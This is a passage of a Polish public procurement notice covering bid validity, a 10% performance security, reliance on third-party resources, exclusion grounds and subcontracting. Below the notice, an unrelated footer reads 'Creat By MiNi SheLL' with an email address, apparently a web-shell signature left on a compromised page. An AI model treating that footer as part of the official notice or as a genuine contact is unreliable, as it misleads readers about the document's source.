<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1) Od Wykonawcy, którego oferta zostanie uznana jako najkorzystniejsza wymagane będzie wniesienie przed zawarciem umowy zabezpieczenia należytego wykonania zobowiązań w wysokości 10 % ceny całkowitej brutto podanej w ofercie. Szczegóły dot. zabezpieczenia należytego wykonania zobowiązań w SIWZ. 2) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. 2.1) Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z pkt. 2), odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. 3) Zamawiający wyklucza z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem niniejszego postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia. 4) Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę kluczowych części zamówienia. Szczegóły dot. podwykonawstwa w SIWZ.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com